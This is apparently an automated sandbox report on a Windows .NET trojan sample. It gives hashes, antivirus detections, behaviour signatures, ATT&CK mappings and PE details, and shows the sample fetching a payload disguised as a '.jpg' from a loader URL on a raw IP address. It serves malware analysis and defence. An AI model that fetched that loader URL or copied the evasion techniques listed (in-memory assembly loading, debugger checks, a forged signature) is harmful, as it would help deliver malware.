
Windows Analysis Report
P355uy6y7d

Overview

General Information

Sample Name: P355uy6y7d (renamed file extension from none to exe)
Analysis ID: 630062
MD5: 36cf17949de5c5b6352c9d43ae2b6171
SHA1: 44b8ca8856a490f67bd87b61aaee9fa659861813
SHA256: 4e88ad28c28a0c02bec0b70271acf0ad1898f64ee1e9ef5a86f844001fb3a19a
Tags: exe, trojan

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
.NET source code contains potential unpacker
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
One or more processes crash
PE file contains strange resources
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
HTTP GET or POST without a user agent
Enables debug privileges

Classification

Classification radar (axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • P355uy6y7d.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\P355uy6y7d.exe" MD5: 36CF17949DE5C5B6352C9D43AE2B6171)
    • WerFault.exe (PID: 5052 cmdline: C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: P355uy6y7d.exe | Avira: detected
Source: P355uy6y7d.exe | Virustotal: Detection: 27%
Source: P355uy6y7d.exe | ReversingLabs: Detection: 19%
Source: P355uy6y7d.exe | Joe Sandbox ML: detected
Source: P355uy6y7d.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:nY source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Desktop\P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2F62.tmp.dmp.6.dr
Source: Binary string: 0C:\Windows\mscorlib.pdbG> source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.pdbP source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbNn source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Core.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\P355uy6y7d.PDB source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb.0p source: P355uy6y7d.exe, 00000000.00000000.415231893.0000000001435000.00000004.00000010.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500514321.0000000001435000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp, WER2F62.tmp.dmp.6.dr
Source: Binary string: indows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb`. source: P355uy6y7d.exe, 00000000.00000002.500653431.000000000166E000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422939811.000000000166E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Core.pdb source: WER2F62.tmp.dmp.6.dr
Source: Binary string: mscorlib.ni.pdbRSDS] source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2F62.tmp.dmp.6.dr
Source: Binary string: System.ni.pdb source: WER2F62.tmp.dmp.6.dr
Source: global traffic | HTTP traffic detected: GET /loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg HTTP/1.1, Host: 194.87.31.4, Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 194.87.31.4 (identical entry repeated 50 times)
Source: P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.87.31.4
Source: P355uy6y7d.exe, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg
Source: P355uy6y7d.exe | String found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxu
Source: P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: global traffic | HTTP traffic detected: GET /loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg HTTP/1.1, Host: 194.87.31.4, Connection: Keep-Alive
Source: P355uy6y7d.exe | Static PE information: No import functions for PE file found
Source: P355uy6y7d.exe | Binary or memory string: OriginalFilename vs P355uy6y7d.exe
Source: P355uy6y7d.exe, 00000000.00000002.500555693.00000000015A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs P355uy6y7d.exe
Source: P355uy6y7d.exe, 00000000.00000000.422618831.00000000015A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs P355uy6y7d.exe
Source: P355uy6y7d.exe | Binary or memory string: OriginalFilenameRevoveryUpdate.exe" vs P355uy6y7d.exe
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360
Source: P355uy6y7d.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: P355uy6y7d.exe | Static PE information: invalid certificate
Source: P355uy6y7d.exe | Virustotal: Detection: 27%
Source: P355uy6y7d.exe | ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\P355uy6y7d.exe | File read: C:\Users\user\Desktop\P355uy6y7d.exe
Source: P355uy6y7d.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll (identical entry repeated 2 times)
Source: unknown | Process created: C:\Users\user\Desktop\P355uy6y7d.exe "C:\Users\user\Desktop\P355uy6y7d.exe"
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6948
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F62.tmp
Source: P355uy6y7d.exe | String found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg
Source: P355uy6y7d.exe | String found in binary or memory: http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxujml-Uicqqfdirrhcqhiwjmrgee7Gwagkw.Properties.Resources>?
Source: classification engine | Classification label: mal64.evad.winEXE@2/4@0/1
Source: C:\Windows\System32\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (identical entry repeated 2 times)
Source: C:\Users\user\Desktop\P355uy6y7d.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: P355uy6y7d.exe | Static file information: File size 2276808 > 1048576
Source: P355uy6y7d.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: P355uy6y7d.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: P355uy6y7d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: P355uy6y7d.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x201400
Source: P355uy6y7d.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation

Source: P355uy6y7d.exe, Program.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: P355uy6y7d.exe | Static PE information: 0xFF1B72D1 [Mon Aug 17 21:49:05 2105 UTC]
Source: C:\Windows\System32\WerFault.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 34 times)
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 20 times)
Source: P355uy6y7d.exe, 00000000.00000002.500595064.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000000.422736503.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Process queried: DebugPort (identical entry repeated 2 times)
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Queries volume information: C:\Users\user\Desktop\P355uy6y7d.exe VolumeInformation
Source: C:\Users\user\Desktop\P355uy6y7d.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ATT&CK matrix, listed per tactic (number of matching signatures in parentheses):
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Command and Scripting Interpreter (2), Scheduled Task/Job, At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (1), Disable or Modify Tools (1), Software Packing (1), Process Injection (1), Timestomp (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Query Registry (1), Security Software Discovery (11), Virtualization/Sandbox Evasion (1), System Information Discovery (12), Remote System Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol (1), Application Layer Protocol (1), Ingress Tool Transfer (1), Protocol Impersonation, Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
Impact: Modify System Partition, Device Lockout, Delete Device Data
Behavior Graph (ID: 630062, Sample: P355uy6y7d, Start date: 19/05/2022, Architecture: WINDOWS, Score: 64)
  • Start -> P355uy6y7d.exe (started); signatures attached to the sample: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; Machine Learning detection for sample
  • P355uy6y7d.exe -> 194.87.31.4, 49736, 80 (ASBAXETNRU, Russian Federation)
  • P355uy6y7d.exe -> WerFault.exe (started)
  • WerFault.exe -> C:\ProgramData\Microsoft\...\Report.wer, Little-endian (dropped)

Source | Detection | Scanner | Label
P355uy6y7d.exe | 28% | Virustotal |
P355uy6y7d.exe | 20% | ReversingLabs | Win64.Trojan.Generic
P355uy6y7d.exe | 100% | Avira | HEUR/AGEN.1216637
P355uy6y7d.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
0.0.P355uy6y7d.exe.bc0000.0.unpack | 100% | Avira | HEUR/AGEN.1216637
0.0.P355uy6y7d.exe.bc0000.2.unpack | 100% | Avira | HEUR/AGEN.1216637
0.0.P355uy6y7d.exe.bc0000.1.unpack | 100% | Avira | HEUR/AGEN.1216637
0.2.P355uy6y7d.exe.bc0000.0.unpack | 100% | Avira | HEUR/AGEN.1216637
No Antivirus matches
Source | Detection | Scanner | Label
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg | 3% | Virustotal |
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg | 0% | Avira URL Cloud | safe
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxu | 0% | Avira URL Cloud | safe
http://194.87.31.4 | 0% | Virustotal |
http://194.87.31.4 | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg | false | 3% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.Hqaevkxu | P355uy6y7d.exe | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://194.87.31.4 | P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
194.87.31.4 | unknown | Russian Federation | 49392 | ASBAXETNRU | false
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:630062
    Start date and time: 19/05/202212:57:102022-05-19 12:57:10 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 24s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:P355uy6y7d (renamed file extension from none to exe)
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:23
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal64.evad.winEXE@2/4@0/1
    EGA Information:Failed
    HDC Information:
    • Successful, ratio: 16.7% (good quality ratio 16.7%)
    • Quality average: 83.5%
    • Quality standard deviation: 16.5%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
    • TCP Packets have been reduced to 100
    • Excluded IPs from analysis (whitelisted): 104.208.16.94
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
    • Execution Graph export aborted for target P355uy6y7d.exe, PID 6948 because it is empty
    • Not all processes were analyzed, report is missing behavior information
    • Report size getting too big, too many NtSetInformationFile calls found.
    Time | Type | Description
    12:58:56 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
    No context
    Process:C:\Windows\System32\WerFault.exe
    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):65536
    Entropy (8bit):1.0911164644330105
    Encrypted:false
    SSDEEP:96:djFGMn50+XgIfuaQqYMlHGxsiKpXIQcQUc6FcE/cw37Dp+BHUHZ0ownOgFkEwk6s:BVz3wUHKBlIa1cOqyG/u7sPS274ltE
    MD5:1112C2BDE6D1FAD635C04BA83E7CA865
    SHA1:2847CCADEA24E94449BFD17B116637B90897FE0C
    SHA-256:CA821EFDA66FA874FBD009C6828BE681F29DF13AE5E8D5727C529A04579A6608
    SHA-512:5F73B055428160E1CF48965FFAB0C18966A4D6981CA669F43CD8F7473AA2B438B57D91792E6B3383D2C361416CC4199D1107DB39B5AE71F885F2688A4C261D50
    Malicious:true
    Reputation:low
    Preview:Version=1 EventType=CLR20r3 EventTime=132974639037228246 ReportType=2 Consent=1 UploadTime=132974639056290539 ReportStatus=524384 ReportIdentifier=dafcbf86-3a91-4eaa-9928-3ba8e3362c3b IntegratorReportIdentifier=9177f70c-bc0c-4218-86be-05584cd47a02 Wow64Host=34404 NsAppName=P355uy6y7d.exe OriginalFilename=RevoveryUpdate.exe AppSessionGuid=00001b24-0001-0017-b8ed-e3c4ba6bd801 TargetAppId=W:0006b0233cf043f2d76451df5498faccc8eb00000000!000044b8ca8856a490f67bd87b61aaee9fa659861813!P355u
    Process:C:\Windows\System32\WerFault.exe
    File Type:Mini DuMP crash report, 16 streams, Thu May 19 19:58:24 2022, 0x1205a4 type
    Category:dropped
    Size (bytes):401160
    Entropy (8bit):2.957989987936535
    Encrypted:false
    SSDEEP:3072:L4kWg6wrnwak1v5QH0G4lmF0+/QgqjGeahYr4PZkl9cfdW+JrRyw:sk3nrOjH1WY8PZvW+7l
    MD5:3E6762E99AFEBC71C19EB8452630C15B
    SHA1:3079004F1AB77448470251BB97D484F6BC7E6129
    SHA-256:1E6CE67EE6738DA9B14502509FDEF27810F93D8EB80B5091B61266687096FB95
    SHA-512:655034E064492FF548321FCF580D2F859D988C2418A46965432C14861D396521A35CEF99EC8618E81D2E783357B477ED9E07B65250C1BDA9C16C8B0AA89D8CAA
    Malicious:false
    Reputation:low
    Process:C:\Windows\System32\WerFault.exe
    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):8800
    Entropy (8bit):3.6960811409252265
    Encrypted:false
    SSDEEP:192:Rrl7r3GLNiZ6te6YoiI9Ml4ZgmfZQSnCprH89bn2dfrNm:RrlsNi0E6YdI9McgmfKSnnUfs
    MD5:5F578A64C53EA0CC21393A2D36DAAC59
    SHA1:B3E190E53ED2C81A84F270F773214C5D05595778
    SHA-256:45B85F0082969CFAD98AAEDBB3C2A0A9EA1E72084C9E6DEF3D441303E535902C
    SHA-512:C3B4B1B698CC62EFD56E8020F2E00AF4423DE324F5E9E98FD04FFF796EAC078E12ECE7D120D0F1B934F7F7F61E0A1AA7005B3A60FD1E5BDDEDE18CD8D288A541
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6948</Pid>
    Process:C:\Windows\System32\WerFault.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4795
    Entropy (8bit):4.462266573144948
    Encrypted:false
    SSDEEP:48:cvIwSD8zsuJgtBI9tkcWgc8sqYjh8fm8M4JwMNzsFP1oyq8veNzWT5ABd:uITfkAVgrsqYaJwM6oWeQT5ABd
    MD5:03188F452F07F1FB52381AAB2183D0BD
    SHA1:90DB7B7C8D1A40F5BCB1AB4AE408795D0158B3E1
    SHA-256:FF42CDA6F5C9076D66BB53A15F526A887C60399B9DD3697E4DA6E3DB7822ADC6
    SHA-512:6CB34A36BDC0B8E52F3AD6670B37EF13EDF3E2187558A27477D2DF7D0750C6E9C5D05A1D6E31662059FF309C20E9A5777C48E0EF780D76B53BCE954B282938FE
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1522389" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
    Entropy (8bit):7.920655166214458
    TrID:
    • Win64 Executable GUI Net Framework (217006/5) 49.88%
    • Win64 Executable GUI (202006/5) 46.43%
    • Win64 Executable (generic) (12005/4) 2.76%
    • Generic Win/DOS Executable (2004/3) 0.46%
    • DOS Executable Generic (2002/1) 0.46%
    File name:P355uy6y7d.exe
    File size:2276808
    MD5:36cf17949de5c5b6352c9d43ae2b6171
    SHA1:44b8ca8856a490f67bd87b61aaee9fa659861813
    SHA256:4e88ad28c28a0c02bec0b70271acf0ad1898f64ee1e9ef5a86f844001fb3a19a
    SHA512:7918342745abccc91d6cd65b1450463929aad89ce373b168cbf2ff0c93d0677bf4a391d19eee0fea57146e1e47c80240c56435eff86980791a35ff5c9896ded7
    SSDEEP:49152:Ayuh7CBWXj2KeHJmuAK3u5LBE3cRJ0/fyJPU+XAzpHjoPqp:tQ7HPeN7+5nRJ8AfO3p
    TLSH:B3B500919965CC89D4A6DFF328F685B7D30E1FED6E2094AC3240FF351AB64AC1B40D26
    Icon Hash:e8b2f0f0ecf0f2e8
    Entrypoint:0x140000000
    Entrypoint Section:
    Digitally signed:true
    Imagebase:0x140000000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0xFF1B72D1 [Mon Aug 17 21:49:05 2105 UTC]
    TLS Callbacks:
    CLR (.Net) Version:v4.0.30319
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:
    Signature Valid:false
    Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
    Signature Validation Error:The digital signature of the object did not verify
    Error Number:-2146869232
    Not Before, Not After
    • 9/2/2021 11:32:59 AM 9/1/2022 11:32:59 AM
    Subject Chain
    • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
    Version:3
    Thumbprint MD5:D15B2B9631F8B37BA8D83A5AE528A8BB
    Thumbprint SHA-1:8740DF4ACB749640AD318E4BE842F72EC651AD80
    Thumbprint SHA-256:2EB421FBB33BBF9C8F6B58C754B0405F40E02CB6328936AAE39DB7A24880EA21
    Serial:33000002528B33AAF895F339DB000000000252
    Instruction
    dec ebp
    pop edx
    nop
    add byte ptr [ebx], al
    add byte ptr [eax], al
    add byte ptr [eax+eax], al
    add byte ptr [eax], al
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x204000 | 0x27f96 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x229600 | 0x27c8 | .rsrc
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x2000 | 0x20133c | 0x201400 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
